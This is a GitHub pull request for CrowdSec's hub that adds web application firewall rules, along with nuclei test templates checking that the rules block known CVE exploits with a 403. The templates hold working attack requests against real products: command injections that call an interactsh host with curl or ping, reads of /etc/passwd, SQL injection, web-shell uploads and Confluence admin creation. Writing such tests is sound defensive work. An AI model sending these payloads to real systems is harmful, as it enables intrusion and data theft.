Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Application Security Engine support #755

Merged
merged 209 commits into from
Dec 15, 2023
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
209 commits
Select commit Hold shift + click to select a range
426fdac
waf-rules support
blotus Jun 1, 2023
e54ef40
Update blockers meta
actions-user Jun 1, 2023
655450e
Merge branch 'master' into waf-rules
Jun 12, 2023
5838081
Update index
actions-user Jun 12, 2023
7fdc3e9
also gen index when waf rules are updated
Jun 12, 2023
cb88846
Update index
actions-user Jun 12, 2023
0b8cb6f
up
buixor Jun 16, 2023
499c8be
fix collec
buixor Jun 16, 2023
9970037
Update index
actions-user Jun 16, 2023
2f093e3
groupby
buixor Jun 16, 2023
4d53633
Update index
actions-user Jun 16, 2023
b578d92
add crs as datafiles
blotus Jun 23, 2023
3c67c4b
Merge branch 'master' into waf-rules
blotus Jun 23, 2023
7fbb4ad
Update index
actions-user Jun 23, 2023
dce72b8
up
blotus Jun 23, 2023
60655f8
fix waf-rules index gen action
blotus Jun 23, 2023
8d5b855
Update index
actions-user Jun 23, 2023
140b2c7
update
buixor Jul 20, 2023
a6fe293
Update index
actions-user Jul 20, 2023
3655c27
test adding crs to coraza collection
blotus Jul 24, 2023
0e5710f
Update index
actions-user Jul 24, 2023
20f30d3
up
blotus Jul 24, 2023
7cf68f3
Update index
actions-user Jul 24, 2023
faabc58
up
blotus Jul 24, 2023
306e439
Update blockers meta
actions-user Jul 24, 2023
2ed32e8
merge
blotus Jul 24, 2023
9b02594
Update index
actions-user Jul 24, 2023
525ef4e
up
blotus Jul 24, 2023
2606b5c
Update index
actions-user Jul 24, 2023
361ba6a
rename waf-rules to waap-rules
blotus Oct 18, 2023
a818689
Update index
actions-user Oct 18, 2023
79566ef
up
blotus Oct 18, 2023
1dc3d21
Update index
actions-user Oct 18, 2023
6fc9c4b
up
blotus Oct 18, 2023
d993433
Update index
actions-user Oct 18, 2023
3328313
add waap-configs object in index.json
blotus Oct 19, 2023
5e1715c
Update blockers meta
actions-user Oct 19, 2023
f4b237a
add in collections as well
blotus Oct 19, 2023
118bcfb
run ci on waap-configs update
blotus Oct 19, 2023
a631b71
Update index
actions-user Oct 19, 2023
e8ba391
up
blotus Oct 19, 2023
ddfb10e
Update index
actions-user Oct 19, 2023
0da0258
up
buixor Oct 20, 2023
cd11055
Update index
actions-user Oct 20, 2023
ed7c2da
up
buixor Oct 20, 2023
67b8166
Update index
actions-user Oct 20, 2023
2c9b259
do like this for now
buixor Oct 20, 2023
03d6757
reflect new syntax
buixor Oct 26, 2023
7886cca
Update index
actions-user Oct 26, 2023
e6f935a
up scenario & parser
buixor Oct 27, 2023
78d0b27
uppp
buixor Oct 27, 2023
0c19f66
up
blotus Oct 27, 2023
2ac0333
merge from master
blotus Oct 27, 2023
19525bb
up
blotus Oct 27, 2023
7e176ab
Update taxonomy
actions-user Oct 27, 2023
c2d5e77
Update index
actions-user Oct 27, 2023
bb87d63
add taxo validation for waap-rules
buixor Nov 14, 2023
0050534
Update taxonomy
actions-user Nov 14, 2023
9d7e589
Update index
actions-user Nov 14, 2023
db99840
make taxo script check waap-rules too
buixor Nov 14, 2023
5b4da80
fix script
buixor Nov 14, 2023
39af831
up taxo
buixor Nov 14, 2023
3e5d0a2
Update taxonomy
actions-user Nov 14, 2023
e0d672e
Update index
actions-user Nov 14, 2023
e276b7b
cwe support
buixor Nov 14, 2023
76df75f
Update taxonomy
actions-user Nov 14, 2023
e06a9d9
Update index
actions-user Nov 14, 2023
c2c834f
add taxo for waap-rules
buixor Nov 15, 2023
1bb578f
Update index
actions-user Nov 15, 2023
ee840d4
waap test #1
buixor Nov 17, 2023
14aa951
add acquis and waap config for waap rules test
buixor Nov 17, 2023
166dc26
up
buixor Nov 17, 2023
98361f5
up waap rules tests
buixor Nov 21, 2023
fc1cb3f
move waap tests
buixor Nov 21, 2023
3dd6ffd
test new action
AlteredCoder Nov 22, 2023
f9cfd47
up
AlteredCoder Nov 22, 2023
5a9455a
up
AlteredCoder Nov 22, 2023
1d7a94b
disable hubtest for now
AlteredCoder Nov 22, 2023
de8d9a9
up
AlteredCoder Nov 22, 2023
881e3a3
fix
AlteredCoder Nov 22, 2023
c0c8fc5
test this
AlteredCoder Nov 22, 2023
b538189
up
AlteredCoder Nov 22, 2023
3afa1f3
test it
AlteredCoder Nov 22, 2023
58c44e2
up
AlteredCoder Nov 22, 2023
10b003a
up
AlteredCoder Nov 22, 2023
e0464ed
update
AlteredCoder Nov 22, 2023
0d1ef65
update coraza scenarios
AlteredCoder Nov 22, 2023
23dfa4d
Update taxonomy
actions-user Nov 22, 2023
90ff7e9
rename waap to appsec
blotus Dec 4, 2023
5681be0
Update taxonomy
actions-user Dec 4, 2023
4b4a4c8
rename waap to appsec
blotus Dec 4, 2023
0bd5095
Update taxonomy
actions-user Dec 4, 2023
3c15835
add crs collection
blotus Dec 4, 2023
b6c7611
Update index
actions-user Dec 4, 2023
090d85e
fix syntax for crowdsecurity/crs
blotus Dec 4, 2023
0cd292c
fix crs name
blotus Dec 4, 2023
1a64a96
add appsec-config for crs
blotus Dec 4, 2023
7069917
Update taxonomy
actions-user Dec 4, 2023
fe18fc2
Update index
actions-user Dec 4, 2023
d876211
fix appsec config for crs
blotus Dec 5, 2023
a35c697
Update index
actions-user Dec 5, 2023
b85dc96
evt.Waap -> evt.Appsec
blotus Dec 5, 2023
b29258c
Update index
actions-user Dec 5, 2023
b9060bb
clear appsec-{config,rules} from index
blotus Dec 5, 2023
d59e93c
fix appsec-rules name in crs collection
blotus Dec 5, 2023
f7aa676
Update index
actions-user Dec 5, 2023
7fed6e0
update crs name
AlteredCoder Dec 5, 2023
069a4a2
Update index
actions-user Dec 5, 2023
9c7ab40
update appsec
AlteredCoder Dec 5, 2023
d7ceac7
Update index
actions-user Dec 5, 2023
78191b3
more renaming
blotus Dec 5, 2023
0e91553
fix acquis config for tests
blotus Dec 5, 2023
8e41ac9
run appsec in debug mode in tests
blotus Dec 5, 2023
9b7f49b
debug mode for appsec hubtest
blotus Dec 5, 2023
4aec2ee
stop debug appsec-logs
AlteredCoder Dec 5, 2023
0134fcc
Update index
actions-user Dec 5, 2023
86fb489
force debug level in acquis when running appsec tests
blotus Dec 5, 2023
01c1b81
update bouncer nginx conf
AlteredCoder Dec 5, 2023
71e3c29
rename
buixor Dec 6, 2023
e9b3417
Update index
actions-user Dec 6, 2023
3a8c969
up
buixor Dec 6, 2023
fd67ca8
Update index
actions-user Dec 6, 2023
12d644f
up
buixor Dec 6, 2023
d936065
upp
buixor Dec 6, 2023
d5d021c
Update index
actions-user Dec 6, 2023
4e6130d
update
AlteredCoder Dec 6, 2023
dc9654b
Update index
actions-user Dec 6, 2023
467513c
CVE-2023-22515
buixor Dec 8, 2023
7061b39
Update taxonomy
actions-user Dec 8, 2023
91e2933
Update index
actions-user Dec 8, 2023
a84051c
CVE-2023-33617
buixor Dec 8, 2023
b49d5af
Update taxonomy
actions-user Dec 8, 2023
0de42df
Update index
actions-user Dec 8, 2023
02c7942
CVE-2023-20198
buixor Dec 8, 2023
8aac941
Update taxonomy
actions-user Dec 8, 2023
edec8be
Update index
actions-user Dec 8, 2023
7cb5af9
CVE-2020-11738
buixor Dec 8, 2023
836c84a
Update taxonomy
actions-user Dec 8, 2023
5b89199
Update index
actions-user Dec 8, 2023
a666175
up
buixor Dec 8, 2023
29bd497
Update index
actions-user Dec 8, 2023
1068ab3
fixed grammar
buixor Dec 8, 2023
39d17a1
add rule to detect access to .env files
blotus Dec 8, 2023
e742734
Update taxonomy
actions-user Dec 8, 2023
38da4ec
Update index
actions-user Dec 8, 2023
1b5b610
Update index
actions-user Dec 8, 2023
6d20c19
add vpatch rules
AlteredCoder Dec 8, 2023
ae71003
Update taxonomy
actions-user Dec 8, 2023
b929935
Update index
actions-user Dec 8, 2023
82a3d00
upadte nuclei
AlteredCoder Dec 8, 2023
f75eaa5
Add new rule
AlteredCoder Dec 8, 2023
0711687
Update index
actions-user Dec 8, 2023
6ec82fd
2023-3519
buixor Dec 11, 2023
5655e21
Update taxonomy
actions-user Dec 11, 2023
259ac78
Update index
actions-user Dec 11, 2023
37cbead
add bae-config appsec rule
blotus Dec 11, 2023
ebee9de
Update index
actions-user Dec 11, 2023
baab0ba
update .gitignore
blotus Dec 11, 2023
e5bc293
up
buixor Dec 11, 2023
1d4bb01
Update taxonomy
actions-user Dec 11, 2023
78928a8
Update index
actions-user Dec 11, 2023
872ab21
add CVE-2023-24489
blotus Dec 12, 2023
438e837
Update taxonomy
actions-user Dec 12, 2023
7de1c6e
Update index
actions-user Dec 12, 2023
6ba06a3
fix CVE-2022-35914 rule
blotus Dec 12, 2023
46b3001
Update index
actions-user Dec 12, 2023
32f3e04
update vpatch collection
AlteredCoder Dec 12, 2023
0605343
Add CVE-2023-50164
AlteredCoder Dec 12, 2023
ea06710
Update taxonomy
actions-user Dec 12, 2023
ceb1001
Update index
actions-user Dec 12, 2023
a190c07
add CVE-2021-3129
AlteredCoder Dec 12, 2023
64d43bc
Update taxonomy
actions-user Dec 12, 2023
b9255e9
Update index
actions-user Dec 12, 2023
2fd1d75
Merge branch 'master' into waf-rules
blotus Dec 14, 2023
fe6da7a
Update taxonomy
actions-user Dec 14, 2023
896df7b
use main branches for crowdsec and nginx bouncer in appsec tests
blotus Dec 14, 2023
a5eef7b
ignore crs and base-config appsec rules in taxonomy
blotus Dec 14, 2023
b5d2085
update rule for CVE-2023-34362
blotus Dec 14, 2023
4a59cb4
Update index
actions-user Dec 14, 2023
01dc6f0
Add docker for easier hubtest in local
AlteredCoder Dec 14, 2023
c4e8af6
re-enable hubtests
blotus Dec 14, 2023
3e2a839
fix docker
AlteredCoder Dec 14, 2023
d560e3d
up
buixor Dec 12, 2023
b9af031
make parsers/scenarios at least 3.0 so crowdsec 1.5.5 won't try to lo…
buixor Dec 14, 2023
8a7711f
Update taxonomy
actions-user Dec 14, 2023
adaba5c
Update index
actions-user Dec 14, 2023
316cb56
remove debug from appsec-rules/parsers/scenarios
blotus Dec 14, 2023
8575873
Update index
actions-user Dec 14, 2023
6060ec2
update CWE
blotus Dec 15, 2023
fdd9642
Update taxonomy
actions-user Dec 15, 2023
8043795
Update index
actions-user Dec 15, 2023
3b1de02
CVE-2022-44877
buixor Dec 15, 2023
e8c2905
Update taxonomy
actions-user Dec 15, 2023
f0496da
Update index
actions-user Dec 15, 2023
4138fff
update appsec-inband scenario
blotus Dec 15, 2023
3ceec05
Update index
actions-user Dec 15, 2023
69a1e34
add CI to lint collection vpatch
AlteredCoder Dec 15, 2023
f436306
Update taxonomy
actions-user Dec 15, 2023
adf008d
update port to use a non-default 7822 port
buixor Dec 15, 2023
432787a
Update taxonomy
actions-user Dec 15, 2023
84c9541
Fix typo
AlteredCoder Dec 15, 2023
dbf5859
Update taxonomy
actions-user Dec 15, 2023
a8c6e9f
fix action name
AlteredCoder Dec 15, 2023
d964c52
fix script
AlteredCoder Dec 15, 2023
b5ed996
scripts/appsec_vpatch_lint.py
AlteredCoder Dec 15, 2023
800c1d0
udpate
AlteredCoder Dec 15, 2023
bd93b89
fix vpatch collection
AlteredCoder Dec 15, 2023
c0d13d3
Update index
actions-user Dec 15, 2023
ee780c0
update lint action
AlteredCoder Dec 15, 2023
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
22 changes: 22 additions & 0 deletions .appsec-tests/CVE-2017-9841/CVE-2017-9841.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
id: CVE-2017-9841
info:
name: CVE-2017-9841
author: crowdsec
severity: info
description: CVE-2017-9841 testing
tags: appsec-testing
http:
#this is a dummy request, edit the request(s) to match your needs
- raw:
- |
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html

<?php echo md5(phpunit_rce);?>
cookie-reuse: true
#test will fail because we won't match http status
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2017-9841/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
nuclei_template: CVE-2017-9841.yaml
24 changes: 24 additions & 0 deletions .appsec-tests/CVE-2019-12989/CVE-2019-12989.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
id: CVE-2019-12989
info:
name: CVE-2019-12989
author: crowdsec
severity: info
description: CVE-2019-12989 testing
tags: appsec-testing
http:
#this is a dummy request, edit the request(s) to match your needs
- raw:
- |
POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
Host: {{Hostname}}
SSL_CLIENT_VERIFY: SUCCESS
Content-Type: application/json
Content-Length: 178

{"get_package_file": {"site_name": "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_01234';#","appliance_type": "primary","package_type": "active"}}
cookie-reuse: true
#test will fail because we won't match http status
matchers:
- type: status
status:
- 403
4 changes: 4 additions & 0 deletions .appsec-tests/CVE-2019-12989/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
nuclei_template: CVE-2019-12989.yaml
20 changes: 20 additions & 0 deletions .appsec-tests/CVE-2020-11738/CVE-2020-11738.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
id: CVE-2020-11738
info:
name: CVE-2020-11738
author: crowdsec
severity: info
description: CVE-2020-11738 testing
tags: appsec-testing
http:
#this is a dummy request, edit the request(s) to match your needs
- raw:
- |
GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}

cookie-reuse: true
#test will fail because we won't match http status
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2020-11738/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
nuclei_template: CVE-2020-11738.yaml
31 changes: 31 additions & 0 deletions .appsec-tests/CVE-2021-22941/CVE-2021-22941.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
id: CVE-2021-22941
info:
name: CVE-2021-22941
author: crowdsec
severity: info
description: CVE-2021-22941 testing
tags: appsec-testing
http:
#this is a dummy request, edit the request(s) to match your needs
- raw:
- |
POST /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123 HTTP/1.1
Host: 127.0.0.1:4241
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=boundary
Content-Length: 104

--boundary
Content-Disposition: form-data; name="text4"; filename="text5"

V8C7BH6OHT
--boundary--
cookie-reuse: true
#test will fail because we won't match http status
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2021-22941/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
nuclei_template: CVE-2021-22941.yaml
30 changes: 30 additions & 0 deletions .appsec-tests/CVE-2021-3129/CVE-2021-3129.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2021-3129
info:
name: CVE-2021-3129
author: crowdsec
severity: info
description: CVE-2021-3129 testing
tags: appsec-testing
http:
- raw:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: application/json

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: application/json

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}

cookie-reuse: true
#test will fail because we won't match http status
matchers:
- type: status
status:
- 403
4 changes: 4 additions & 0 deletions .appsec-tests/CVE-2021-3129/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
nuclei_template: CVE-2021-3129.yaml
19 changes: 19 additions & 0 deletions .appsec-tests/CVE-2022-27926/CVE-2022-27926.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
id: CVE-2022-27926

info:
name: Zimbra Collaboration (ZCS) - Cross Site Scripting
author: rootxharsh,iamnoooob,pdresearch
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.

http:
- method: GET
path:
- "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"

matchers-condition: and
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2022-27926/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
nuclei_template: CVE-2022-27926.yaml
26 changes: 26 additions & 0 deletions .appsec-tests/CVE-2022-35914/CVE-2022-35914.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
id: CVE-2022-35914

info:
name: GLPI <=10.0.2 - Remote Command Execution
author: For3stCo1d
severity: critical
description: |
GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
variables:
cmd: "cat+/etc/passwd"

http:
- raw:
- |
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: sid=foo

sid=foo&hhook=exec&text={{cmd}}

matchers-condition: and
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2022-35914/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
nuclei_template: CVE-2022-35914.yaml
22 changes: 22 additions & 0 deletions .appsec-tests/CVE-2022-44877/CVE-2022-44877.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
id: CVE-2022-44877
info:
name: CVE-2022-44877
author: crowdsec
severity: info
description: CVE-2022-44877 testing
tags: appsec-testing
http:
#this is a dummy request, edit the request(s) to match your needs
- raw:
- |
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

username=root&password=toor&commit=Login
cookie-reuse: true
#test will fail because we won't match http status
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2022-44877/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
nuclei_template: CVE-2022-44877.yaml
23 changes: 23 additions & 0 deletions .appsec-tests/CVE-2022-46169/CVE-2022-46169.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
id: CVE-2022-46169

info:
name: Cacti <=1.2.22 - Remote Command Injection
author: Hardik-Solanki,j4vaovo
severity: critical
description: |
Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
variables:
useragent: '{{rand_base(6)}}'

http:
- raw:
- |
GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=%3Bcurl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'%3B HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1

matchers-condition: and
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2022-46169/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
nuclei_template: CVE-2022-46169.yaml
39 changes: 39 additions & 0 deletions .appsec-tests/CVE-2023-20198/CVE-2023-20198.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2023-20198
info:
name: CVE-2023-20198
author: crowdsec
severity: info
description: CVE-2023-20198 testing
tags: appsec-testing
http:
- raw:
- |
POST /%2577ebui_wsma_https HTTP/1.1
Host: {{Hostname}}

<?xml version="1.0"?>
<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken SOAP:mustUnderstand="false">
<wsse:Username>#{username}</wsse:Username>
<wsse:Password>*****</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request correlator="xxx" xmlns="urn:cisco:wsma-config">
<configApply details="all" action-on-fail="continue">
<config-data>
<cli-config-data-block><![xxx]]></cli-config-data-block>
</config-data>
</configApply>
</request>
</SOAP:Body>
</SOAP:Envelope>
cookie-reuse: true
#test will fail because we won't match http status
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2023-20198/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
nuclei_template: CVE-2023-20198.yaml
28 changes: 28 additions & 0 deletions .appsec-tests/CVE-2023-22515/CVE-2023-22515.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
id: CVE-2023-22515
info:
name: Atlassian Confluence - Privilege Escalation
severity: critical
author: crowdsec
description: |
Atlassian Confluence Data Center and Server contains a privilege escalation vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.
variables:
username: "{{rand_base(10)}}"
password: "{{rand_base(10)}}"
email: "{{username}}@{{password}}"

http:
- raw:
- |
@timeout:20s
POST /setup/setupadministrator.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check

username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
cookie-reuse: true
redirects: true
matchers:
- type: status
status:
- 403
3 changes: 3 additions & 0 deletions .appsec-tests/CVE-2023-22515/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
nuclei_template: CVE-2023-22515.yaml
31 changes: 31 additions & 0 deletions .appsec-tests/CVE-2023-24489/CVE-2023-24489.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
id: CVE-2023-24489
info:
name: CVE-2023-24489
author: crowdsec
severity: info
description: CVE-2023-24489 testing
tags: appsec-testing
variables:
fileName: '{{rand_base(8)}}'
#in real life padding varies to abuse the crypto bug
padding: 'QUFBQUFBQUFBQUFBQUFBAEFBQUFBQUFBQUFBQUFBQUE='
http:
- raw:
- |
POST /documentum/upload.aspx?parentid={{padding}}&raw=1&unzip=on&uploadid={{fileName}}\..\..\..\cifs&filename={{fileName}}.aspx HTTP/1.1
Host: {{Hostname}}

<%@ Page Language="C#" Debug="true" Trace="false" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
Response.Write("{{randstr}}");
}
</script>

cookie-reuse: true
#test will fail because we won't match http status
matchers:
- type: status
status:
- 403
4 changes: 4 additions & 0 deletions .appsec-tests/CVE-2023-24489/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
nuclei_template: CVE-2023-24489.yaml
Loading